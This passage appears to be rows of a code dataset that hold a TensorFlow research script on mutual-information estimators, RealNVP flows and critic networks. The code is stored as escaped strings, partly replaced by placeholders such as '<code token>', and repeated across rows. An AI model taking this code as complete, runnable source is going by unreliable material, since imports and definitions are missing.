self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n 
validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\ndef real_nvp_default_template(hidden_layers, shift_only=False, activation=\n tf.nn.relu, name=None, *args, **kwargs):\n with tf.compat.v1.name_scope(name or 'real_nvp_default_template'):\n\n def _fn(x, output_units, **condition_kwargs):\n \"\"\"Fully connected MLP parameterized via `real_nvp_template`.\"\"\"\n if condition_kwargs:\n raise NotImplementedError(\n 'Conditioning not implemented in the default template.')\n if tensorshape_util.rank(x.shape) == 1:\n x = x[tf.newaxis, ...]\n reshape_output = lambda x: x[0]\n else:\n reshape_output = lambda x: x\n for units in hidden_layers:\n x = tf1.layers.dense(*args, inputs=x, units=units,\n activation=activation, **kwargs)\n x = tf1.layers.dense(*args, inputs=x, units=(1 if shift_only else\n 2) * output_units, activation=None, **kwargs)\n if shift_only:\n return reshape_output(x), None\n shift, log_scale = tf.split(x, 2, axis=-1)\n return reshape_output(shift), 1e-07 + tf.nn.softplus(reshape_output\n (log_scale))\n return tf1.make_template('real_nvp_default_template', _fn)\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n 
return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\ndef train(g1, g2, critic, loss_fn, learning_rate, batch_size=\n TRAIN_BATCH_SIZE, n_iters=15000, n_evals=15, compute_jacobian=False,\n noise_std=0.0, data_dimensions=DIMS // 2, n_iter=1, loss_name='InfoNCE'):\n \"\"\"Runs the training loop for a fixed model.\n\n Args:\n g1: Function, maps input1 to representation.\n g2: Function, maps input2 to representation.\n critic: Function, maps two representations to scalar.\n loss_fn: Function, mutual information estimator.\n learning_rate: Learning rate.\n batch_size: Training batch size.\n n_iters: Number of optimization iterations.\n n_evals: Number of model evaluations.\n compute_jacobian: Whether to estimate the singular values of the Jacobian.\n noise_std: Standard deviation for the Gaussian noise. Default is 0.0.\n data_dimensions: The dimension of the data. 
By default it's half of the\n original data dimension.\n Returns:\n Returns and instance of `Results` tuple.\n \"\"\"\n x_1, x_2, _ = processed_train_data(data_dimensions, batch_size)\n if noise_std > 0.0:\n assert x_1.shape == x_2.shape, 'X1 and X2 shapes must agree to add noise!'\n noise = noise_std * tf.random.normal(x_1.shape)\n x_1 += noise\n x_2 += noise\n code_1, code_2 = g1(x_1), g2(x_2)\n critic_matrix = critic(code_1, code_2)\n if compute_jacobian:\n jacobian = gradients.batch_jacobian(code_1, x_1, use_pfor=False)\n singular_values = tf.linalg.svd(jacobian, compute_uv=False)\n loss = loss_fn(critic_matrix)\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)\n if not loss_name == 'wpc':\n optimizer_op = optimizer.minimize(loss)\n else:\n gvs = optimizer.compute_gradients(loss)\n capped_gvs = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad,\n var in gvs]\n optimizer_op = optimizer.apply_gradients(capped_gvs)\n with tf.compat.v1.Session() as session:\n session.run(tf.compat.v1.global_variables_initializer())\n data_ph = tf.compat.v1.placeholder(tf.float32, shape=[None,\n data_dimensions])\n data_ph_noisy = data_ph + noise_std * tf.random.normal(tf.shape(\n input=data_ph))\n codes = g1(data_ph_noisy)\n (training_losses, testing_losses, classification_accuracies, iters,\n sigmas) = [], [], [], [], []\n for iter_n in range(n_iters):\n if iter_n % (n_iters // n_evals) == 0:\n iters.append(iter_n)\n accuracy = get_classification_accuracy(session, codes,\n data_ph, data_dimensions)\n classification_accuracies.append(accuracy)\n testing_losses.append(get_testing_loss(x_test, session,\n loss, data_ph, data_dimensions))\n if compute_jacobian:\n sigmas.append(session.run(singular_values))\n print(\n '{:d}th iter Loss_name {} Step {:>10d} fit {:>.5f} DS {} B {:d} lr {:f}'\n .format(n_iter, loss_name, iter_n, accuracy, args.\n dataset, args.batch_size, args.lr))\n loss_np, _ = session.run([loss, optimizer_op])\n training_losses.append(loss_np)\n return Results(iterations=iters, training_losses=training_losses,\n testing_losses=testing_losses, classification_accuracies=\n classification_accuracies, singular_values=sigmas)\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! 
Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\ndef run_all_experiments():\n tf.compat.v1.reset_default_graph()\n wpc_loss = lambda x: -infonce_lower_bound(x)\n cpc_loss = lambda x: -infonce_lower_bound(x)\n drfc_loss = lambda x: -our_lower_bound(x)\n pcc_loss = lambda x: -js_fgan_lower_bound(x)\n skew_pcc_loss = lambda x: -skew_js_fgan_lower_bound(x)\n ls_pcc_loss = lambda x: -label_smooth_pcc(x)\n pre_ls_pcc_loss = lambda x: -predict_smooth_pcc(x)\n adap_pred_smooth_pcc_loss = lambda x: -adap_pred_smooth_pcc(x)\n adap_label_smooth_pcc_loss = lambda x: -adap_label_smooth_pcc(x)\n loss_fcts = {'pcc': pcc_loss, 'cpc': cpc_loss, 'ls_pcc': ls_pcc_loss,\n 'prels_pcc': pre_ls_pcc_loss, 'adap_pred_pcc':\n adap_pred_smooth_pcc_loss, 'adap_label_pcc': adap_label_smooth_pcc_loss\n }\n kwargs = dict(shift_only=True, activation=lambda x: tf.nn.relu(x),\n kernel_initializer=tf.compat.v1.initializers.truncated_normal(\n stddev=0.0001), bias_initializer='zeros')\n nets = {'realnvp': lambda : (RealNVPBijector(DIMS // 2, n_couplings=30,\n hidden_layers=[512, 512], dense_kwargs=kwargs), RealNVPBijector(\n DIMS // 2, n_couplings=30, hidden_layers=[512, 512], dense_kwargs=\n kwargs))}\n critics = {'bilinear': lambda : BilinearCritic(feature_dim=DIMS // 2)}\n return run_sweep(nets, critics, loss_fcts, 'invertible', n_iters=21000,\n n_evals=21)\n\n\n<code token>\n",
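The adap_label_smooth_pcc and adap_pred_smooth_pcc losses in these rows depend on a piecewise-linear schedule acti_func(x, a, b, c) whose constants a, b, c are defined elsewhere in the script. A hedged, standalone sketch of that schedule and of the adaptive label-smoothing loss built on it follows; the values a=0.2, b=0.3, c=0.7 are illustrative assumptions, not the script's settings.

# Hedged sketch: adaptive smoothing schedule and the loss that uses it.
import tensorflow as tf

def acti_func(x, a, b, c):
    # Large smoothing for confident predictions (x near 0 or 1), none in the band (b, c).
    x = tf.stop_gradient(x)
    alpha = tf.zeros_like(x)
    alpha = tf.where(x <= b, -a * x / b + a, alpha)
    alpha = tf.where((x > b) & (x < c), tf.zeros_like(x), alpha)
    alpha = tf.where(x >= c, a * x / (1 - c) + a * c / (c - 1), alpha)
    return alpha

def adap_label_smooth_bce(f, a=0.2, b=0.3, c=0.7):
    # Smooth the 0/1 positive-pair labels by an amount chosen per prediction.
    n = tf.shape(f)[0]
    labels = tf.reshape(tf.eye(n), [-1, 1])
    probs = tf.reshape(tf.sigmoid(f), [-1, 1])
    alpha = acti_func(probs, a, b, c)
    smoothed = (1.0 - alpha) * labels + alpha / 2.0
    bce = tf.keras.losses.BinaryCrossentropy()
    return -bce(smoothed, probs)

f = tf.random.normal((8, 8))  # toy critic matrix
print(float(adap_label_smooth_bce(f)))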
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n\n\ndef acti_func(x, a, b, c):\n x = tf.stop_gradient(x)\n alpha = tf.zeros_like(x)\n alpha = tf.where(x <= b, -a * x / b + a, alpha)\n alpha = tf.where((x > b) & (x < c), 0.0, alpha)\n alpha = tf.where(x >= c, a * x / (1 - c) + a * c / (c - 1), alpha)\n return alpha\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\ndef apply_default_style(ax):\n ax.set_xlim([0, 20001])\n ax.get_xaxis().set_major_formatter(FuncFormatter(lambda x, p: format(\n int(x / 1000), ',')))\n ax.set_xlabel('Training steps (in thousands)')\n plt.tick_params(top=False, right=False, bottom=False, left=False)\n handles, labels = ax.get_legend_handles_labels()\n plt.legend(loc='lower right', handles=handles[1:], labels=labels[1:])\n\n\ndef get_testing_loss(x_array, session, loss, data_ph, dims, batch_size=512):\n total_loss = 0\n for i in range(0, x_array.shape[0], batch_size):\n x_slice = x_array[i:i + batch_size, :dims]\n total_loss += x_slice.shape[0] * session.run(loss, feed_dict={\n data_ph: x_slice})\n return total_loss / x_array.shape[0]\n\n\ndef get_classification_accuracy(session, codes, data_ph, dims):\n x_train_mapped = map_data(x_train, session, codes, data_ph, dims)\n x_test_mapped = map_data(x_test, session, codes, data_ph, dims)\n accuracy = logistic_fit(x_train_mapped, y_train, x_test_mapped, y_test)\n return accuracy\n\n\ndef map_data(x_array, session, codes, data_ph, dims, batch_size=512):\n x_mapped = []\n for i in range(0, x_array.shape[0], batch_size):\n x_mapped.append(session.run(codes, feed_dict={data_ph: x_array[i:i +\n batch_size, :dims]}))\n return np.concatenate(x_mapped, axis=0)\n\n\ndef reduce_logmeanexp_nodiag(x, axis=None):\n batch_size = x.shape[0]\n logsumexp = tf.reduce_logsumexp(input_tensor=x - tf.linalg.tensor_diag(\n np.inf * tf.ones(batch_size)), axis=axis)\n if axis:\n num_elem = batch_size - 1.0\n else:\n num_elem = batch_size * (batch_size - 1.0)\n return logsumexp - tf.math.log(num_elem)\n\n\ndef tuba_lower_bound(scores, log_baseline=None):\n if log_baseline is not None:\n scores -= log_baseline[:, None]\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n marg_term = tf.exp(reduce_logmeanexp_nodiag(scores))\n return 1.0 + joint_term - marg_term\n\n\n<function token>\n\n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. 
(2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return first_term - second_term\n\n\[email protected]\ndef infonce_lower_bound(scores):\n \"\"\"InfoNCE lower bound from van den Oord et al. (2018).\"\"\"\n nll = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores) - tf.\n reduce_logsumexp(input_tensor=scores, axis=1))\n mi = tf.math.log(tf.cast(scores.shape[0], tf.float32)) + nll\n return mi\n\n\[email protected]\ndef our_lower_bound(scores):\n \"\"\"Our lower bound\"\"\"\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n scores_sq = scores ** 2\n marg_num = batch_size * (batch_size - 1.0)\n marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(\n input_tensor=tf.linalg.diag_part(scores_sq))\n marg_term = marg_term / marg_num\n return joint_term - 0.5 * marg_term\n\n\[email protected]\ndef skew_js_fgan_lower_bound(f):\n \"\"\"skewed js lower bound (true cross entropy)\"\"\"\n n = tf.cast(f.shape[0], tf.float32)\n alpha = 1 / n\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return alpha * first_term - (1 - alpha) * second_term\n\n\[email protected]\ndef label_smooth_pcc(f):\n \"\"\" pcc with label smoothing trick\"\"\"\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n labels = (1.0 - args.smoothing) * labels + args.smoothing / 2\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\[email protected]\ndef predict_smooth_pcc(f):\n \"\"\" pcc with predictor smoothing trick\"\"\"\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n pre_prob = (1.0 - args.smoothing) * pre_prob + args.smoothing / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\[email protected]\ndef adap_label_smooth_pcc(f):\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n alpha = acti_func(pre_prob, a, b, c)\n new_labels = (1.0 - alpha) * labels + alpha / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(new_labels, pre_prob)\n\n\n<function token>\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\ndef load_data(split):\n return tfds.load(TFDS_NAME, data_dir='/public/wangxu/data/', split=split\n ).cache().map(map_func=map_fn).shuffle(1000)\n\n\ndef tfds_to_np(dataset):\n features = list(tfds.as_numpy(dataset))\n images = np.stack([f[FEATURE_INPUT].ravel() 
for f in features])\n labels = np.stack([f[FEATURE_LABEL].ravel() for f in features])\n return images, labels\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n 
validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\ndef real_nvp_default_template(hidden_layers, shift_only=False, activation=\n tf.nn.relu, name=None, *args, **kwargs):\n with tf.compat.v1.name_scope(name or 'real_nvp_default_template'):\n\n def _fn(x, output_units, **condition_kwargs):\n \"\"\"Fully connected MLP parameterized via `real_nvp_template`.\"\"\"\n if condition_kwargs:\n raise NotImplementedError(\n 'Conditioning not implemented in the default template.')\n if tensorshape_util.rank(x.shape) == 1:\n x = x[tf.newaxis, ...]\n reshape_output = lambda x: x[0]\n else:\n reshape_output = lambda x: x\n for units in hidden_layers:\n x = tf1.layers.dense(*args, inputs=x, units=units,\n activation=activation, **kwargs)\n x = tf1.layers.dense(*args, inputs=x, units=(1 if shift_only else\n 2) * output_units, activation=None, **kwargs)\n if shift_only:\n return reshape_output(x), None\n shift, log_scale = tf.split(x, 2, axis=-1)\n return reshape_output(shift), 1e-07 + tf.nn.softplus(reshape_output\n (log_scale))\n return tf1.make_template('real_nvp_default_template', _fn)\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n 
return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\ndef train(g1, g2, critic, loss_fn, learning_rate, batch_size=\n TRAIN_BATCH_SIZE, n_iters=15000, n_evals=15, compute_jacobian=False,\n noise_std=0.0, data_dimensions=DIMS // 2, n_iter=1, loss_name='InfoNCE'):\n \"\"\"Runs the training loop for a fixed model.\n\n Args:\n g1: Function, maps input1 to representation.\n g2: Function, maps input2 to representation.\n critic: Function, maps two representations to scalar.\n loss_fn: Function, mutual information estimator.\n learning_rate: Learning rate.\n batch_size: Training batch size.\n n_iters: Number of optimization iterations.\n n_evals: Number of model evaluations.\n compute_jacobian: Whether to estimate the singular values of the Jacobian.\n noise_std: Standard deviation for the Gaussian noise. Default is 0.0.\n data_dimensions: The dimension of the data. 
By default it's half of the\n original data dimension.\n Returns:\n Returns and instance of `Results` tuple.\n \"\"\"\n x_1, x_2, _ = processed_train_data(data_dimensions, batch_size)\n if noise_std > 0.0:\n assert x_1.shape == x_2.shape, 'X1 and X2 shapes must agree to add noise!'\n noise = noise_std * tf.random.normal(x_1.shape)\n x_1 += noise\n x_2 += noise\n code_1, code_2 = g1(x_1), g2(x_2)\n critic_matrix = critic(code_1, code_2)\n if compute_jacobian:\n jacobian = gradients.batch_jacobian(code_1, x_1, use_pfor=False)\n singular_values = tf.linalg.svd(jacobian, compute_uv=False)\n loss = loss_fn(critic_matrix)\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)\n if not loss_name == 'wpc':\n optimizer_op = optimizer.minimize(loss)\n else:\n gvs = optimizer.compute_gradients(loss)\n capped_gvs = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad,\n var in gvs]\n optimizer_op = optimizer.apply_gradients(capped_gvs)\n with tf.compat.v1.Session() as session:\n session.run(tf.compat.v1.global_variables_initializer())\n data_ph = tf.compat.v1.placeholder(tf.float32, shape=[None,\n data_dimensions])\n data_ph_noisy = data_ph + noise_std * tf.random.normal(tf.shape(\n input=data_ph))\n codes = g1(data_ph_noisy)\n (training_losses, testing_losses, classification_accuracies, iters,\n sigmas) = [], [], [], [], []\n for iter_n in range(n_iters):\n if iter_n % (n_iters // n_evals) == 0:\n iters.append(iter_n)\n accuracy = get_classification_accuracy(session, codes,\n data_ph, data_dimensions)\n classification_accuracies.append(accuracy)\n testing_losses.append(get_testing_loss(x_test, session,\n loss, data_ph, data_dimensions))\n if compute_jacobian:\n sigmas.append(session.run(singular_values))\n print(\n '{:d}th iter Loss_name {} Step {:>10d} fit {:>.5f} DS {} B {:d} lr {:f}'\n .format(n_iter, loss_name, iter_n, accuracy, args.\n dataset, args.batch_size, args.lr))\n loss_np, _ = session.run([loss, optimizer_op])\n training_losses.append(loss_np)\n return Results(iterations=iters, 